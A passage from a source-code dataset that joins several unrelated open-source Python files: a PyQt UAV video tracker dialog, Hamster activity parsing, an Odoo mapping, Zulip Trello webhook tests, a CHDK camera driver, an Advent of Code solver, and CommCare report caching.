self.muteButton.setText("")
self.muteButton.setObjectName("muteButton")
self.gridLayout.addWidget(self.muteButton, 3, 2, 1, 1)
self.comboBox = QtWidgets.QComboBox(NewProject)
self.comboBox.setObjectName("comboBox")
self.gridLayout.addWidget(self.comboBox, 3, 14, 1, 1)
self.pushButton_2 = QtWidgets.QPushButton(NewProject)
self.pushButton_2.setObjectName("pushButton_2")
self.gridLayout.addWidget(self.pushButton_2, 3, 12, 1, 1)
self.toolButton_3 = QtWidgets.QToolButton(NewProject)
icon1 = QtGui.QIcon()
icon1.addPixmap(QtGui.QPixmap(":/plugins/Video_UAV_Tracker/mIconFormSelect.svg"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.toolButton_3.setIcon(icon1)
self.toolButton_3.setObjectName("toolButton_3")
self.gridLayout.addWidget(self.toolButton_3, 3, 11, 1, 1)
self.toolButton_2 = QtWidgets.QToolButton(NewProject)
icon2 = QtGui.QIcon()
icon2.addPixmap(QtGui.QPixmap(":/VgisIcon/mActionAtlasNext.svg"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.toolButton_2.setIcon(icon2)
self.toolButton_2.setObjectName("toolButton_2")
self.gridLayout.addWidget(self.toolButton_2, 3, 9, 1, 1)
self.SkipFortoolButton_8 = QtWidgets.QToolButton(NewProject)
self.SkipFortoolButton_8.setStyleSheet("")
icon3 = QtGui.QIcon()
icon3.addPixmap(QtGui.QPixmap(":/VgisIcon/mActionArrowRight.svg"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.SkipFortoolButton_8.setIcon(icon3)
self.SkipFortoolButton_8.setObjectName("SkipFortoolButton_8")
self.gridLayout.addWidget(self.SkipFortoolButton_8, 3, 8, 1, 1)
self.SkipBacktoolButton_7 = QtWidgets.QToolButton(NewProject)
self.SkipBacktoolButton_7.setStyleSheet("")
icon4 = QtGui.QIcon()
icon4.addPixmap(QtGui.QPixmap(":/VgisIcon/mActionArrowLeft.svg"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.SkipBacktoolButton_7.setIcon(icon4)
self.SkipBacktoolButton_7.setObjectName("SkipBacktoolButton_7")
self.gridLayout.addWidget(self.SkipBacktoolButton_7, 3, 7, 1, 1)
self.toolButton = QtWidgets.QToolButton(NewProject)
icon5 = QtGui.QIcon()
icon5.addPixmap(QtGui.QPixmap(":/VgisIcon/mActionAtlasPrev.svg"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.toolButton.setIcon(icon5)
self.toolButton.setObjectName("toolButton")
self.gridLayout.addWidget(self.toolButton, 3, 6, 1, 1)
self.pushButton = QtWidgets.QPushButton(NewProject)
self.pushButton.setObjectName("pushButton")
self.gridLayout.addWidget(self.pushButton, 3, 0, 1, 1)
self.gridLayout_2.addLayout(self.gridLayout, 0, 0, 1, 1)
self.retranslateUi(NewProject)
QtCore.QMetaObject.connectSlotsByName(NewProject)
def retranslateUi(self, NewProject):
_translate = QtCore.QCoreApplication.translate
NewProject.setWindowTitle(_translate("NewProject", "Video UAV Tracker - New Project"))
self.replayPlay_pushButton.setText(_translate("NewProject", "Play/Pause"))
self.replayPosition_label.setText(_translate("NewProject", "-:- / -:-"))
self.pushButton_2.setToolTip(_translate("NewProject", "<html><head/><body><p>Synchronize actual video frame with selected GPS time</p></body></html>"))
self.comboBox.setToolTip(_translate("NewProject", "<html><head/><body><p> GPS time</p></body></html>"))
self.pushButton_2.setText(_translate("NewProject", "Synchronize!"))
self.toolButton_3.setToolTip(_translate("NewProject", "<html><head/><body><p>Add point shape database to project</p></body></html>"))
#self.toolButton_3.setText(_translate("NewProject", "DB"))
self.toolButton_2.setToolTip(_translate("NewProject", "<html><head/><body><p>Next second</p></body></html>"))
self.toolButton_2.setText(_translate("NewProject", ">>"))
self.SkipFortoolButton_8.setToolTip(_translate("NewProject", "<html><head/><body><p>Next frame</p></body></html>"))
self.SkipFortoolButton_8.setText(_translate("NewProject", ">"))
self.SkipBacktoolButton_7.setToolTip(_translate("NewProject", "<html><head/><body><p>Previous frame</p></body></html>"))
self.SkipBacktoolButton_7.setText(_translate("NewProject", "<"))
self.toolButton.setToolTip(_translate("NewProject", "<html><head/><body><p>Previous second</p></body></html>"))
self.toolButton.setText(_translate("NewProject", "<<"))
self.pushButton.setToolTip(_translate("NewProject", "<html><head/><body><p>Select video and relative gpx</p></body></html>"))
self.pushButton.setText(_translate("NewProject", "Select Video and GPX"))
| gpl-2.0 | 340,023,915,727,115,900 | 53.273885 | 159 | 0.69804 | false |
projecthamster/hamster | src/hamster/lib/parsing.py | 1 | 2802 | import logging
logger = logging.getLogger(__name__) # noqa: E402
import re
from hamster.lib import datetime as dt
# separator between times and activity
ACTIVITY_SEPARATOR = r"\s+"
# match #tag followed by any space or # that will be ignored
# tag must not contain '#' or ','
tag_re = re.compile(r"""
\# # hash character
(?P<tag>
[^#,]+ # (anything but hash or comma)
)
\s* # maybe spaces
# forbid double comma (tag can not be before the tags barrier):
,? # single comma (or none)
\s* # maybe space
$ # end of text
""", flags=re.VERBOSE)
tags_separator = re.compile(r"""
(,{0,2}) # 0, 1 or 2 commas
\s* # maybe spaces
$ # end of text
""", flags=re.VERBOSE)
def parse_fact(text, range_pos="head", default_day=None, ref="now"):
"""Extract fact fields from the string.
Returns found fields as a dict.
Tentative syntax (not accurate):
start [- end_time] activity[@category][,, description][,,]{ #tag}
According to the legacy tests, # were allowed in the description
"""
res = {}
text = text.strip()
if not text:
return res
# datetimes
# force at least a space to avoid matching 10.00@cat
(start, end), remaining_text = dt.Range.parse(text, position=range_pos,
separator=ACTIVITY_SEPARATOR,
default_day=default_day)
res["start_time"] = start
res["end_time"] = end
# tags
# Need to start from the end, because
# the description can hold some '#' characters
tags = []
while True:
# look for tags separators
# especially the tags barrier
m = re.search(tags_separator, remaining_text)
remaining_text = remaining_text[:m.start()]
if m.group(1) == ",,":
# tags barrier found
break
# look for tag
m = re.search(tag_re, remaining_text)
if m:
tag = m.group('tag').strip()
# strip the matched string (including #)
remaining_text = remaining_text[:m.start()]
tags.append(tag)
else:
# no tag
break
# put tags back in input order
res["tags"] = list(reversed(tags))
# description
# first look for double comma (description hard left boundary)
head, sep, description = remaining_text.partition(",,")
res["description"] = description.strip()
remaining_text = head.strip()
# activity
split = remaining_text.rsplit('@', maxsplit=1)
activity = split[0]
category = split[1] if len(split) > 1 else ""
res["activity"] = activity
res["category"] = category
return res
| gpl-3.0 | 7,552,497,756,821,847,000 | 27.591837 | 80 | 0.560314 | false |
ecino/compassion-modules | mobile_app_connector/mappings/wp_post_mapping.py | 3 | 1595 | # -*- coding: utf-8 -*-
##############################################################################
#
# Copyright (C) 2019 Compassion CH (http://www.compassion.ch)
# Releasing children from poverty in Jesus' name
# @author: Emanuel Cino <[email protected]>
#
# The licence is in the file __manifest__.py
#
##############################################################################
from odoo.addons.message_center_compassion.mappings.base_mapping import \
OnrampMapping
class WPPostMapping(OnrampMapping):
ODOO_MODEL = 'wp.post'
MAPPING_NAME = 'mobile_app_wp_post'
CONNECT_MAPPING = {
'Blog': {
'ImageUrl': 'image_url',
'Title': 'name',
'Url': 'url',
'WP_id': 'wp_id',
'Post_type': 'post_type',
},
'Title': 'name',
'ActionText': 'name',
'SortOrder': 'view_order',
'IsAutomaticOrdering': 'is_automatic_ordering',
'OrderDate': 'date',
'Type': 'tile_type',
'SubType': 'tile_subtype'
}
FIELDS_TO_SUBMIT = {
'Blog.ImageUrl': None,
'Blog.Title': None,
'Blog.Url': None,
'Blog.WP_id': None,
'Blog.Post_type': None,
'Title': None,
'ActionDestination': None,
'Type': None,
'SubType': None,
'ActionText': None,
'SortOrder': None,
'IsAutomaticOrdering': None,
'OrderDate': None,
}
CONSTANTS = {
'ActionDestination': 'Stories and prayer with relevant blog at '
'the top'
}
| agpl-3.0 | 6,705,988,417,673,983,000 | 28 | 78 | 0.477116 | false |
hackerkid/zulip | zerver/webhooks/trello/tests.py | 4 | 9453 | from typing import Dict
from unittest.mock import patch
import orjson
from zerver.lib.test_classes import WebhookTestCase
class TrelloHookTests(WebhookTestCase):
STREAM_NAME = "trello"
URL_TEMPLATE = "/api/v1/external/trello?stream={stream}&api_key={api_key}"
FIXTURE_DIR_NAME = "trello"
def test_trello_confirmation_request(self) -> None:
response = self.client_head(self.build_webhook_url())
self.assertEqual(response.status_code, 200, response)
def test_trello_webhook_when_card_was_moved_to_another_list(self) -> None:
expected_message = "TomaszKolek moved [This is a card.](https://trello.com/c/r33ylX2Z) from Basics to Intermediate."
self.check_webhook("changing_cards_list", "Welcome Board", expected_message)
def test_trello_webhook_when_card_was_renamed(self) -> None:
expected_message = 'TomaszKolek renamed the card from "Old name" to [New name](https://trello.com/c/r33ylX2Z).'
self.check_webhook("renaming_card", "Welcome Board", expected_message)
def test_trello_webhook_when_label_was_added_to_card(self) -> None:
expected_message = 'TomaszKolek added a green label with "text value" to [Card name](https://trello.com/c/r33ylX2Z).'
self.check_webhook("adding_label_to_card", "Welcome Board", expected_message)
def test_trello_webhook_when_label_was_removing_from_card(self) -> None:
expected_message = 'TomaszKolek removed a green label with "text value" from [New Card](https://trello.com/c/r33ylX2Z).'
self.check_webhook("removing_label_from_card", "Welcome Board", expected_message)
def test_trello_webhook_when_member_was_added_to_card(self) -> None:
expected_message = (
"TomaszKolek added TomaszKolek to [Card name](https://trello.com/c/9BduUcVQ)."
)
self.check_webhook("adding_member_to_card", "Welcome Board", expected_message)
def test_trello_webhook_when_member_was_removed_from_card(self) -> None:
expected_message = (
"TomaszKolek removed Trello from [Card name](https://trello.com/c/9BduUcVQ)."
)
self.check_webhook("removing_member_from_card", "Welcome Board", expected_message)
def test_trello_webhook_when_due_date_was_set(self) -> None:
expected_message = "TomaszKolek set due date for [Card name](https://trello.com/c/9BduUcVQ) to 2016-05-11 10:00:00 UTC."
self.check_webhook("setting_due_date_to_card", "Welcome Board", expected_message)
def test_trello_webhook_when_due_date_was_changed(self) -> None:
expected_message = "TomaszKolek changed due date for [Card name](https://trello.com/c/9BduUcVQ) from 2016-05-11 10:00:00 UTC to 2016-05-24 10:00:00 UTC."
self.check_webhook("changing_due_date_on_card", "Welcome Board", expected_message)
def test_trello_webhook_when_due_date_was_removed(self) -> None:
expected_message = (
"TomaszKolek removed the due date from [Card name](https://trello.com/c/9BduUcVQ)."
)
self.check_webhook("removing_due_date_from_card", "Welcome Board", expected_message)
def test_trello_webhook_when_card_was_archived(self) -> None:
expected_message = "TomaszKolek archived [Card name](https://trello.com/c/9BduUcVQ)."
self.check_webhook("archiving_card", "Welcome Board", expected_message)
def test_trello_webhook_when_card_was_reopened(self) -> None:
expected_message = "TomaszKolek reopened [Card name](https://trello.com/c/9BduUcVQ)."
self.check_webhook("reopening_card", "Welcome Board", expected_message)
def test_trello_webhook_when_card_was_created(self) -> None:
expected_message = "TomaszKolek created [New card](https://trello.com/c/5qrgGdD5)."
self.check_webhook("creating_card", "Welcome Board", expected_message)
def test_trello_webhook_when_attachment_was_added_to_card(self) -> None:
expected_message = "TomaszKolek added [attachment_name](http://url.com) to [New card](https://trello.com/c/xPKXoSTQ)."
self.check_webhook("adding_attachment_to_card", "Welcome Board", expected_message)
def test_trello_webhook_when_checklist_was_added_to_card(self) -> None:
expected_message = "TomaszKolek added the Checklist checklist to [New card](https://trello.com/c/xPKXoSTQ)."
self.check_webhook("adding_checklist_to_card", "Welcome Board", expected_message)
def test_trello_webhook_when_check_item_is_checked(self) -> None:
expected_message = "Eeshan Garg checked **Tomatoes** in **Checklist** ([Something something](https://trello.com/c/R2thJK3P))."
self.check_webhook("check_item_on_card_checklist", "Zulip", expected_message)
def test_trello_webhook_when_check_item_is_unchecked(self) -> None:
expected_message = "Eeshan Garg unchecked **Tomatoes** in **Checklist** ([Something something](https://trello.com/c/R2thJK3P))."
self.check_webhook("uncheck_item_on_card_checklist", "Zulip", expected_message)
def test_trello_webhook_when_member_was_removed_from_board(self) -> None:
expected_message = (
"TomaszKolek removed Trello from [Welcome Board](https://trello.com/b/iqXXzYEj)."
)
self.check_webhook("removing_member_from_board", "Welcome Board", expected_message)
def test_trello_webhook_when_member_was_added_to_board(self) -> None:
expected_message = (
"TomaszKolek added Trello to [Welcome Board](https://trello.com/b/iqXXzYEj)."
)
self.check_webhook("adding_member_to_board", "Welcome Board", expected_message)
def test_trello_webhook_when_list_was_added_to_board(self) -> None:
expected_message = (
"TomaszKolek added New list list to [Welcome Board](https://trello.com/b/iqXXzYEj)."
)
self.check_webhook("adding_new_list_to_board", "Welcome Board", expected_message)
def test_trello_webhook_when_comment_was_added_to_card(self) -> None:
expected_message = "TomaszKolek commented on [New card](https://trello.com/c/xPKXoSTQ):\n~~~ quote\nNew comment\n~~~"
self.check_webhook("adding_comment_to_card", "Welcome Board", expected_message)
def test_trello_webhook_when_board_was_renamed(self) -> None:
expected_message = "TomaszKolek renamed the board from Welcome Board to [New name](https://trello.com/b/iqXXzYEj)."
self.check_webhook("renaming_board", "New name", expected_message)
def verify_post_is_ignored(self, payload: str) -> None:
with patch("zerver.webhooks.trello.view.check_send_webhook_message") as m:
result = self.client_post(self.url, payload, content_type="application/json")
self.assertFalse(m.called)
self.assert_json_success(result)
def test_trello_webhook_when_card_is_moved_within_single_list_ignore(self) -> None:
payload = self.get_body("moving_card_within_single_list")
self.verify_post_is_ignored(payload)
def test_trello_webhook_when_board_background_is_changed_ignore(self) -> None:
payload = self.get_body("change_board_background_image")
self.verify_post_is_ignored(payload)
def test_ignored_card_actions(self) -> None:
"""
Certain card-related actions are now ignored solely based on the
action type, and we don't need to do any other parsing to ignore
them as invalid.
"""
actions = [
"copyCard",
"createCheckItem",
"updateCheckItem",
"updateList",
]
for action in actions:
data = dict(
model="whatever",
action=dict(
type=action,
),
)
payload = orjson.dumps(data).decode()
self.verify_post_is_ignored(payload)
def test_ignoring_card_updates(self) -> None:
fields = [
"cover",
"dueComplete",
"idAttachmentCover",
"pos",
]
for field in fields:
card: Dict[str, object] = {}
old = {}
old[field] = "should-be-ignored"
data = dict(
model="whatever",
action=dict(
type="updateCard",
data=dict(card=card, old=old),
),
)
payload = orjson.dumps(data).decode()
self.verify_post_is_ignored(payload)
def test_trello_webhook_when_description_was_added_to_card(self) -> None:
expected_message = "Marco Matarazzo set description for [New Card](https://trello.com/c/P2r0z66z) to:\n~~~ quote\nNew Description\n~~~"
self.check_webhook("adding_description_to_card", "Welcome Board", expected_message)
def test_trello_webhook_when_description_was_removed_from_card(self) -> None:
expected_message = (
"Marco Matarazzo removed description from [New Card](https://trello.com/c/P2r0z66z)."
)
self.check_webhook("removing_description_from_card", "Welcome Board", expected_message)
def test_trello_webhook_when_description_was_changed_on_card(self) -> None:
expected_message = "Marco Matarazzo changed description for [New Card](https://trello.com/c/P2r0z66z) from\n~~~ quote\nNew Description\n~~~\nto\n~~~ quote\nChanged Description\n~~~"
self.check_webhook("changing_description_on_card", "Welcome Board", expected_message)
| apache-2.0 | -2,209,405,371,688,587,800 | 50.655738 | 189 | 0.656617 | false |
jbaiter/spreads | spreadsplug/dev/chdkcamera.py | 2 | 16340 | # -*- coding: utf-8 -*-
import logging
import os
import re
import subprocess
import tempfile
import time
from fractions import Fraction
from itertools import chain
import usb
from jpegtran import JPEGImage
from spreads.vendor.pathlib import Path
from spreads.config import OptionTemplate
from spreads.plugin import DevicePlugin, DeviceFeatures
from spreads.util import DeviceException
class CHDKPTPException(Exception):
pass
class CHDKCameraDevice(DevicePlugin):
""" Plugin for digital cameras running the CHDK firmware.
"""
features = (DeviceFeatures.PREVIEW, DeviceFeatures.IS_CAMERA)
target_page = None
_cli_flags = None
_chdk_buildnum = None
_can_remote = False
_zoom_steps = 0
MAX_RESOLUTION = 0
MAX_QUALITY = 0
@classmethod
def configuration_template(cls):
conf = super(CHDKCameraDevice, cls).configuration_template()
conf.update(
{'sensitivity': OptionTemplate(80, "The ISO sensitivity value"),
'shutter_speed': OptionTemplate(
u"1/25", "The shutter speed as a fraction"),
'zoom_level': OptionTemplate(3, "The default zoom level"),
'dpi': OptionTemplate(300, "The capturing resolution"),
'shoot_raw': OptionTemplate(False, "Shoot in RAW format (DNG)"),
'focus_distance': OptionTemplate(0, "Set focus distance"),
'monochrome': OptionTemplate(
False, "Shoot in monochrome mode (reduces file size)"),
'chdkptp_path': OptionTemplate(
u"/usr/local/lib/chdkptp",
"Path to CHDKPTP binary/libraries"),
})
return conf
@classmethod
def yield_devices(cls, config):
""" Search for usable devices, yield one at a time
:param config: spreads configuration
:type config: spreads.confit.ConfigView
"""
SPECIAL_CASES = {
# (idVendor, idProduct): SpecialClass
(0x4a9, 0x31ef): QualityFix, # not r47, but has the same bug
(0x4a9, 0x3218): QualityFix,
(0x4a9, 0x3223): QualityFix,
(0x4a9, 0x3224): QualityFix,
(0x4a9, 0x3225): QualityFix,
(0x4a9, 0x3226): QualityFix,
(0x4a9, 0x3227): QualityFix,
(0x4a9, 0x3228): QualityFix,
(0x4a9, 0x3229): QualityFix,
(0x4a9, 0x322a): A2200,
(0x4a9, 0x322b): QualityFix,
(0x4a9, 0x322c): QualityFix,
}
for dev in usb.core.find(find_all=True):
cfg = dev.get_active_configuration()[(0, 0)]
ids = (dev.idVendor, dev.idProduct)
is_ptp = (hex(cfg.bInterfaceClass) == "0x6"
and hex(cfg.bInterfaceSubClass) == "0x1")
if not is_ptp:
continue
if ids in SPECIAL_CASES:
yield SPECIAL_CASES[ids](config, dev)
else:
yield cls(config, dev)
def __init__(self, config, device):
""" Set connection information and try to obtain target page.
:param config: spreads configuration
:type config: spreads.confit.ConfigView
:param device: USB device to use for the object
:type device: `usb.core.Device <http://github.com/walac/pyusb>`_
"""
self.logger = logging.getLogger('ChdkCamera')
self._usbport = (device.bus, device.address)
self._serial_number = (
usb.util.get_string(device, 256, device.iSerialNumber)
.strip('\x00'))
self.logger.debug("Device has serial number {0}"
.format(self._serial_number))
self.config = config
self._cli_flags = []
self._cli_flags.append("-c-d={1:03} -b={0:03}".format(*self._usbport))
self._cli_flags.append("-eset cli_verbose=2")
self._chdk_buildnum = (self._execute_lua("get_buildinfo()",
get_result=True)
["build_revision"])
# PTP remote shooting is available starting from SVN r2927
self._can_remote = self._chdk_buildnum >= 2927
self._zoom_steps = self._execute_lua("get_zoom_steps()",
get_result=True)
try:
self.target_page = self._get_target_page()
except:
self.target_page = None
# Set camera to highest quality
self._execute_lua('exit_alt(); set_config_value(291, 0);'
'enter_alt();')
self.logger = logging.getLogger('ChdkCamera[{0}]'
.format(self.target_page))
def connected(self):
def match_serial(dev):
serial = (
usb.util.get_string(dev, 256, dev.iSerialNumber)
.strip('\x00'))
return serial == self._serial_number
# Check if device is still attached
unchanged = usb.core.find(bus=self._usbport[0],
address=self._usbport[1],
custom_match=match_serial) is not None
if unchanged:
return True
new_device = usb.core.find(idVendor=0x04a9, # Canon vendor ID
custom_match=match_serial)
if new_device is None:
return False
self._usbport = (new_device.bus, new_device.address)
self._cli_flags[0] = ("-c-d={1:03} -b={0:03}".format(*self._usbport))
return True
def set_target_page(self, target_page):
""" Set the device target page.
:param target_page: The target page name
:type target_page: unicode in (u"odd", u"even")
"""
tmp_handle = tempfile.mkstemp(text=True)
os.write(tmp_handle[0], target_page.upper()+"\n")
self._run("upload {0} \"OWN.TXT\"".format(tmp_handle[1]))
self.target_page = target_page
os.remove(tmp_handle[1])
def prepare_capture(self, path):
shoot_monochrome = self.config['monochrome'].get(bool)
# Try to go into alt mode to prevent weird behaviour
self._execute_lua("enter_alt()")
# Try to put into record mode
try:
self._run("rec")
except CHDKPTPException as e:
self.logger.debug(e)
self.logger.info("Camera already seems to be in recording mode")
self._set_zoom(int(self.config['zoom_level'].get()))
# Disable ND filter
self._execute_lua("set_nd_filter(2)")
self._set_focus()
if shoot_monochrome:
rv = self._execute_lua(
"capmode = require(\"capmode\")\n"
"return capmode.set(\"SCN_MONOCHROME\")",
get_result=True
)
if not rv:
self.logger.warn("Monochrome mode not supported on this "
"device, will be disabled.")
# Disable flash
self._execute_lua("while(get_flash_mode()<2) do click(\"right\") end")
self._execute_lua("set_prop(require('propcase').QUALITY, {0})"
.format(self.MAX_QUALITY))
self._execute_lua("set_prop(require('propcase').RESOLUTION, {0})"
.format(self.MAX_RESOLUTION))
def finish_capture(self):
# Switch camera back to play mode.
# This will retract the lens and protect it from dust.
self._run("play")
def get_preview_image(self):
fpath = tempfile.mkstemp()[1]
cmd = "dumpframes -count=1 -nobm -nopal"
self._run("{0} {1}".format(cmd, fpath))
with open(fpath, 'rb') as fp:
data = fp.read()
os.remove(fpath)
return data
def capture(self, path):
# NOTE: To obtain the "real" Canon ISO value, we multiply the
# "market" value from the config by 0.65.
# See core/shooting.c#~l150 in the CHDK source for more details
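        # e.g. a configured "market" ISO of 80 is passed to CHDK below as
        # 80 * 0.65 = 52.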
sensitivity = int(self.config["sensitivity"].get())
shutter_speed = float(Fraction(self.config["shutter_speed"]
.get(unicode)))
shoot_raw = self.config['shoot_raw'].get(bool)
if self._can_remote:
cmd = ("remoteshoot -tv={0} -sv={1} {2} \"{3}\""
.format(shutter_speed, sensitivity*0.65,
"-dng" if shoot_raw else "", path))
else:
cmd = ("shoot -tv={0} -sv={1} -dng={2} -rm -dl \"{3}\""
.format(shutter_speed, sensitivity*0.65,
int(shoot_raw), path))
try:
self._run(cmd)
except CHDKPTPException as e:
if 'not in rec mode' in e.message:
self.prepare_capture(None)
self.capture(path)
else:
self.logger.warn("Capture command failed.")
raise e
extension = 'dng' if shoot_raw else 'jpg'
local_path = "{0}.{1}".format(path, extension)
# Set EXIF orientation
self.logger.debug("Setting EXIF orientation on captured image")
img = JPEGImage(local_path)
if self.target_page == 'odd':
img.exif_orientation = 6 # -90°
else:
img.exif_orientation = 8 # 90°
img.save(local_path)
def show_textbox(self, message):
messages = message.split("\n")
script = [
'screen_width = get_gui_screen_width();',
'screen_height = get_gui_screen_height();',
'draw_rect_filled(0, 0, screen_width, screen_height, 256, 256);'
]
script.extend(
['draw_string(0, 0+(screen_height/10)*{0}, "{1}", 258, 256);'
.format(idx, msg) for idx, msg in enumerate(messages, 1)]
)
self._execute_lua("\n".join(script), wait=False, get_result=False)
def _run(self, *commands):
chdkptp_path = Path(self.config["chdkptp_path"].get(unicode))
cmd_args = list(chain((unicode(chdkptp_path / "chdkptp"),),
self._cli_flags,
("-e{0}".format(cmd) for cmd in commands)))
env = {'LUA_PATH': unicode(chdkptp_path / "lua/?.lua")}
self.logger.debug("Calling chdkptp with arguments: {0}"
.format(cmd_args))
output = (subprocess.check_output(cmd_args, env=env,
stderr=subprocess.STDOUT)
.splitlines())
self.logger.debug("Call returned:\n{0}".format(output))
# Filter out connected message
output = [x for x in output if not x.startswith('connected:')]
# Check for possible CHDKPTP errors
if any('ERROR' in x for x in output):
raise CHDKPTPException("\n".join(output))
return output
def _execute_lua(self, script, wait=True, get_result=False, timeout=256):
        if get_result and "return" not in script:
script = "return({0})".format(script)
cmd = "luar" if wait else "lua"
output = self._run("{0} {1}".format(cmd, script))
if not get_result:
return
        output = [x for x in output if ":return:" in x][0]
return self._parse_lua_output(output)
def _parse_table(self, data):
values = dict(re.findall(r'([\w_]+?)=(\d+|".*?"),*', data[6:]))
for k, v in values.iteritems():
if v.startswith('"') and v.endswith('"'):
values[k] = v.strip('"') # String
else:
values[k] = int(v) # Integer
return values
def _parse_lua_output(self, output):
ret_val = re.match(r'^\d+:return:(.*)', output).group(1)
if ret_val.startswith('table:'):
return self._parse_table(ret_val) # Table
elif ret_val.startswith("'"):
return ret_val.strip("'") # String
elif ret_val in ('true', 'false'):
return ret_val == 'true'
else:
return int(ret_val) # Integer
def _get_target_page(self):
tmp_handle = tempfile.mkstemp(text=True)
try:
self._run("download \"OWN.TXT\" {0}".format(tmp_handle[1]))
with open(tmp_handle[1], 'r') as fp:
target_page = fp.readline().strip().lower()
except DeviceException:
raise ValueError("Could not find OWN.TXT")
finally:
os.remove(tmp_handle[1])
if not target_page:
raise ValueError("Could not read OWN.TXT")
return target_page
def _set_zoom(self, level):
if level >= self._zoom_steps:
raise ValueError("Zoom level {0} exceeds the camera's range!"
" (max: {1})".format(level, self._zoom_steps-1))
self._execute_lua("set_zoom({0})".format(level), wait=True)
def _acquire_focus(self):
""" Acquire auto focus and lock it. """
self._execute_lua("enter_alt()")
# Try to put into record mode
try:
self._run("rec")
except CHDKPTPException as e:
self.logger.debug(e)
self.logger.info("Camera already seems to be in recording mode")
self._set_zoom(int(self.config['zoom_level'].get()))
self._execute_lua("set_aflock(0)")
self._execute_lua("press('shoot_half')")
time.sleep(0.8)
self._execute_lua("release('shoot_half')")
time.sleep(0.5)
return self._execute_lua("get_focus()", get_result=True)
def _set_focus(self):
focus_distance = int(self.config['focus_distance'].get())
self._execute_lua("set_aflock(0)")
if focus_distance == 0:
return
self._execute_lua("set_focus({0:.0f})".format(focus_distance))
time.sleep(0.5)
self._execute_lua("press('shoot_half')")
time.sleep(0.25)
self._execute_lua("release('shoot_half')")
time.sleep(0.25)
self._execute_lua("set_aflock(1)")
class A2200(CHDKCameraDevice):
""" Canon A2200 driver.
Works around some quirks of that CHDK port.
"""
MAX_RESOLUTION = 0
MAX_QUALITY = 1
def __init__(self, config, device):
super(A2200, self).__init__(config, device)
if self.target_page is not None:
self.logger = logging.getLogger(
'A2200Device[{0}]'.format(self.target_page))
else:
self.logger = logging.getLogger('A2200Device')
def finish_capture(self):
# Putting the device back into play mode crashes the a2200 with
# chdk 1.3, this is why we stub it out here.
pass
def _set_zoom(self, level):
""" Set zoom level.
The A2200 currently has a bug, where setting the zoom level
directly via set_zoom crashes the camera quite frequently, so
we work around that by simulating button presses.
:param level: The zoom level to be used
:type level: int
"""
if level >= self._zoom_steps:
raise ValueError(
"Zoom level {0} exceeds the camera's range!"
" (max: {1})".format(level, self._zoom_steps-1))
zoom = self._execute_lua("get_zoom()", get_result=True)
if zoom < level:
self._execute_lua("while(get_zoom()<{0}) do click(\"zoom_in\") end"
.format(level+1),
wait=True)
elif zoom > level:
self._execute_lua("while(get_zoom()>{0}) "
"do click(\"zoom_out\") end".format(level+1),
wait=True)
class QualityFix(CHDKCameraDevice):
""" Fixes a bug that prevents remote capture with the highest resolution
and quality from succeeding. See this CHDK forum post for more details:
http://chdk.setepontos.com/index.php?topic=4338.msg111318#msg111318
"""
MAX_RESOLUTION = 0
MAX_QUALITY = 1
def __init__(self, config, device):
super(QualityFix, self).__init__(config, device)
if self.target_page is not None:
self.logger = logging.getLogger(
'QualityFixDevice[{0}]'.format(self.target_page))
else:
self.logger = logging.getLogger('QualityFixDevice')
| agpl-3.0 | -6,617,896,385,044,184,000 | 37.71564 | 79 | 0.547068 | false |
BrendanLeber/adventofcode | 2020/09-encoding_error/encoding_error.py | 1 | 2067 | # -*- coding: utf-8 -*-
"""Advent of Code 2020 - Day 9 - Encoding Error."""
import argparse
import pdb
import traceback
from itertools import combinations
from typing import Any, List, Set, Tuple
def parse_input(fname: str) -> List[int]:
"""Read the input file and return the parsed data."""
data = []
with open(fname, "rt") as inf:
for line in inf:
data.append(int(line.strip()))
return data
def get_sums(slice: List[int]) -> Set[int]:
result: Set[int] = set()
for (lhs, rhs) in combinations(slice, 2):
result.add(lhs + rhs)
return result
def check_window(target: int, numbers: List[int], sz: int) -> Tuple[bool, Any]:
for x in range(len(numbers) - sz + 1):
window: List[int] = numbers[x : x + sz]
if sum(window) == target:
return (True, min(window) + max(window))
return (False, None)
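# What solve() below computes (Advent of Code 2020, day 9): part one is the
# first number that is not a sum of two of the preceding `preamble` numbers;
# part two finds a contiguous window summing to that number and returns
# min(window) + max(window).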
def solve(numbers: List[int], preamble: int):
one = None
for idx in range(preamble, len(numbers)):
start: int = idx - preamble
end: int = idx
sums: Set[int] = get_sums(numbers[start:end])
if numbers[idx] not in sums:
one = numbers[idx]
break
two = None
window_size: int = 1
while True:
window_size += 1
found, two = check_window(one, numbers, window_size)
if found:
break
return (one, two)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="Advent of Code - 2020 - Day 9 - Encoding Error.")
parser.add_argument(
"input",
type=str,
default="input.txt",
nargs="?",
help="The puzzle input. (Default %(default)s)",
)
parser.add_argument(
"preamble",
type=int,
default=25,
nargs="?",
help="The number of items in the preamble. (Default %(default)s)",
)
args = parser.parse_args()
try:
data = parse_input(args.input)
print(solve(data, args.preamble))
except Exception:
traceback.print_exc()
pdb.post_mortem()
| mit | 3,329,311,302,426,200,600 | 25.164557 | 99 | 0.570392 | false |
benrudolph/commcare-hq | corehq/apps/reports/cache.py | 2 | 1828 | from django.utils.cache import _generate_cache_header_key
from corehq.util.quickcache import quickcache, QuickCache
DEFAULT_EXPIRY = 60 * 60 # an hour
CACHE_PREFIX = 'hq.reports' # a namespace where cache keys go
class _ReportQuickCache(QuickCache):
"""
Just like QuickCache, but intercepts the function call to abort caching
under certain conditions
"""
def __call__(self, *args, **kwargs):
report = args[0]
if report.is_cacheable and _is_valid(report):
return super(_ReportQuickCache, self).__call__(*args, **kwargs)
else:
return self.fn(*args, **kwargs)
def _is_valid(report):
"""
checks if this meets the preconditions for being allowed in the cache
"""
try:
return (
report.request.domain
and report.request.couch_user._id
and report.request.get_full_path().startswith(
'/a/{domain}/'.format(domain=report.request.domain)
)
)
except AttributeError:
return False
def _custom_vary_on(report):
"""
signature is intentionally restricted to a single argument
to prevent @request_cache() from decorating a method that has non-self args
"""
return [
_generate_cache_header_key(CACHE_PREFIX, report.request),
report.request.domain,
report.request.couch_user._id,
]
def request_cache(expiry=DEFAULT_EXPIRY):
"""
A decorator that can be used on a method of a GenericReportView subclass
or any other class that provides the following properties:
- self.request (a django request object, with .domain and .couch_user)
- self.is_cacheable (boolean)
"""
return quickcache(vary_on=_custom_vary_on,
